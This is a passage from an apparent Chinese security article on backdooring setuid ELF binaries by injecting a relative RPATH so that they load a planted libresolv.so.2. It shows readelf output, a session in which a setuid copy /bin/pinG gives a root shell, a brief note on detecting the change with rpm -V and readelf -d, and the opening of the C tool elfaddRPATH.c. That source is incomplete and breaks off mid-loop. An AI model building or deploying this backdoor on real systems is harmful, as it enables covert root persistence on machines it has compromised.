Dynamic segment at offset 0x5618 contains 22 entries:
Tag Type Name/Value
0x00000001 (NEEDED) Shared library: [libresolv.so.2]
0x00000001 (NEEDED) Shared library: [libc.so.6]
0x0000000c (INIT) 0x8048a7c
0x0000000d (FINI) 0x804bfb0
0x00000004 (HASH) 0x8048128
0x00000005 (STRTAB) 0x8048610
0x00000006 (SYMTAB) 0x80482a0
0x0000000a (STRSZ) 541 (bytes)
0x0000000b (SYMENT) 16 (bytes)
0x00000015 (DEBUG) 0x0
0x00000003 (PLTGOT) 0x804e554
0x00000002 (PLTRELSZ) 360 (bytes)
0x00000014 (PLTREL) REL
0x00000017 (JMPREL) 0x8048914
0x00000011 (REL) 0x80488e4
0x00000012 (RELSZ) 48 (bytes)
0x00000013 (RELENT) 8 (bytes)
0x6ffffffe (VERNEED) 0x80488b4
0x6fffffff (VERNEEDNUM) 1
0x6ffffff0 (VERSYM) 0x8048844
0x0000000f (RPATH) Library rpath: [_wujianqiang:]
0x00000000 (NULL) 0x0
[root@redhat72 disp]# exit
exit
[wujian@redhat72 elf_door]$ cd disp
[wujian@redhat72 disp]$ ls -l
total 28
-rwxr-xr-x 1 root root 17822 Apr 27 00:36 addelfrpath
-rwxr-xr-x 1 root root 5610 Apr 27 00:36 libresolv.so.2
[wujian@redhat72 disp]$ ls -l /bin/pinG
-rwsr-xr-x 1 root root 23436 Apr 27 00:38 /bin/pinG
[wujian@redhat72 disp]$ /bin/pinG
[root@redhat72 disp]# id
uid=0(root) gid=500(wujian) groups=500(wujian)
[root@redhat72 disp]#
三.结论
通过一些实验,基本上所有的suid程序,只要加载了依赖的.so,就可以被添加这个后门。这是一项简单而巧妙的技术,而且不易被发现,所以完整性校验是安全的重要保证(例如用 rpm -V 校验软件包文件,并用 readelf -d 检查 suid 程序的 RPATH 是否含有相对路径或空项,如上文输出中的 [_wujianqiang:]),但我对一个系统被入侵后还能不能用已经不抱希望了:)
四.程序实现
/*
* elfaddRPATH.c
* by wujian (wujianqiangis@mail.china.com) only tested on rh72.
* only for test :) thanks alert7@xfocus scz@nsfocus wandb@nsfocus silvio@big.net.au
* about ELF articles.
*
*/
#include // NOTE(review): the author left out the header names and states that some code is omitted as well; the listing does not build as published
/* Report the failing call through perror() and terminate with exit status 1. */
#define ERR(fn) { perror(fn);exit(1);}
char * symgname= "__gmon_start__";// author's note: default name of the symbol to modify
char * m_symgname="__gmon_start:"; // NOTE(review): symgname with its trailing "__" replaced by ':'; where it is used is not visible in this excerpt
char * myname="_wujianqiang:" // author's note: "modify to ..."; the same string is the Library rpath value in the readelf output above. NOTE(review): the terminating ';' is missing in the published listing
/* Prototype only; the definition of elf_check is not part of this excerpt. */
void elf_check(Elf32_Ehdr *ehdr);
/* Defined directly below; its separator comment describes it as adding an entry to the .dynamic section. */
static int add_ent(int fd ,unsigned int * index , Elf32_Ehdr * ehdr, Elf32_Shdr * shdr);
/* Prototype only; presumably operates on the symbol named by symname. TODO confirm, the definition is not visible here. */
static int mod_sym(int fd , Elf32_Ehdr * ehdr,Elf32_Shdr * shdr,char * symname);
/*---------------------------------add entry in .dynamic section-------------------------*/
static int add_ent(int fd ,unsigned int * index , Elf32_Ehdr * ehdr, Elf32_Shdr * shdr)
{
Elf32_Shdr * shdyn=shdr;
Elf32_Dyn * dyn,*dynp;
int i,offset=0;
int ent=0;
int find=0;
int dt_rpath=15; //from elf spec DT_RPATH=15
for(i=0;ie_shnum;i++)

